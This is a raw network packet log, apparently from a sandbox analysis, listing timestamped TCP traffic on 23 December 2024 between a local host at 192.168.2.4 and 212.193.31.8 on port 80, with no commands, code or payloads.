                                                                      Dec 23, 2024 06:38:39.755919933 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.755919933 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.755919933 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.755919933 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.755945921 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.755971909 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.755999088 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756026983 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756053925 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756077051 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756107092 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756141901 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756159067 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756187916 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756222963 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756233931 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756264925 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756306887 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756390095 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756413937 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756442070 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756469011 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756494999 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756521940 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756546974 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756577015 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756603956 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756629944 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756656885 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756680965 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756705046 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756731033 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756759882 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756786108 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756814957 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756892920 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756927967 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756953955 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.756982088 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757019997 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757077932 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757108927 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757137060 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757160902 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757189989 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757225990 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757256985 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757280111 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757302046 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757327080 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757349014 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757375956 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757405043 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757426977 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757453918 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757502079 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757525921 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757586002 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757611990 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757637024 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757663012 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757688046 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757711887 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757735968 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757757902 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757802963 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757857084 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757884026 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757914066 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757940054 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757965088 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.757987976 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.758014917 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.758035898 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.758061886 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.758079052 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.758105993 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.758136034 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.758193016 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.758223057 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.758255959 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.758290052 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.758317947 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.758378983 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.758435965 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.758476973 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.758500099 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.758527994 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.758555889 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.758584023 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.758604050 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.758629084 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.758723021 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.758775949 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.758807898 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.758836985 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.758876085 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.758910894 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.758946896 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.758972883 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.759007931 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.759048939 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.759099960 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.759159088 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.759191036 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.759234905 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.759262085 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.759287119 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.759331942 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.759342909 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.759393930 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.759465933 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.759497881 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.759526968 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.759553909 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.759584904 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.759609938 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.759637117 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.759663105 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.759691954 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.759717941 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.759743929 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.759769917 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.759795904 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.759821892 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.759848118 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.759893894 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.759893894 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.759918928 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.759953976 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.759978056 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.760004997 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.760035038 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.760060072 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.760087013 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.760111094 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.760137081 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.760282993 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.760308981 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.760333061 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.760361910 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.760389090 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.760421038 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.760482073 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.760510921 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.760540009 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.760570049 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.760591984 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.760615110 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.760644913 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.760668993 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.760693073 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.760718107 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.760742903 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.760771990 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.760823011 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.760848045 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.760879993 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.760904074 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.760931015 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.760955095 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.760978937 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.761007071 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.761029959 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.761058092 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.761080980 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.761106014 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.761128902 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.761154890 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.761182070 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.761209011 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.761234999 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.761262894 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.761288881 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.761317015 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.761342049 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.761367083 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.761390924 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.761415958 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.761442900 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.761466026 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.761491060 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.761514902 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.761540890 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.761567116 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.761595011 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:40.090178013 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090183973 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090188980 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090202093 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090214968 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090228081 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090240955 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090254068 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090269089 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090289116 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090301991 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090315104 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090328932 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090343952 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090357065 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090370893 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090384960 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090399981 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090414047 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090426922 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090440989 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090454102 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090466976 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090481043 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090495110 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090507984 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090523958 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090537071 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090550900 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090564966 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090579033 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090591908 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090605021 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090631962 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090651989 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090665102 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090677023 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090689898 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090703011 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090717077 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090729952 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090745926 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090759039 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090773106 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090785980 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090799093 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090811968 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090826035 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090838909 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090852976 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090866089 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090878963 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090893030 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090904951 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090919018 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090933084 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090945959 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090959072 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.090975046 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091002941 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091017008 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091029882 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091042995 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091057062 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091069937 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091083050 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091099977 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091154099 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091167927 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091192007 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091203928 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091217041 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091229916 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091289043 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091371059 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091384888 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091398001 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091412067 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091438055 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091450930 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091463089 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091475964 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091487885 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091767073 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091780901 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091793060 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091805935 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091819048 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091844082 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091856956 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091869116 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091881990 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091897011 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.091909885 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.092057943 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.092071056 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.092103958 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.092117071 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.092132092 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.092147112 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.092206955 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.092226028 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.092238903 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.092252016 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.092592955 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.092607021 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.092622042 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.092634916 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.092693090 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.092706919 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.092721939 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.092737913 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.092752934 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.092777014 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.092788935 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.092801094 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.092813015 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.092824936 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.092838049 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.092852116 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.092927933 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.092941999 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.092986107 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.092998981 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093010902 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093024015 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093048096 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093060970 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093074083 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093087912 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093101025 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093125105 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093137980 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093403101 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093430042 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093442917 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093455076 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093525887 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093539000 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093553066 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093565941 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093580008 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093591928 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093604088 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093616962 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093643904 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093656063 CET8049740212.193.31.8192.168.2.4
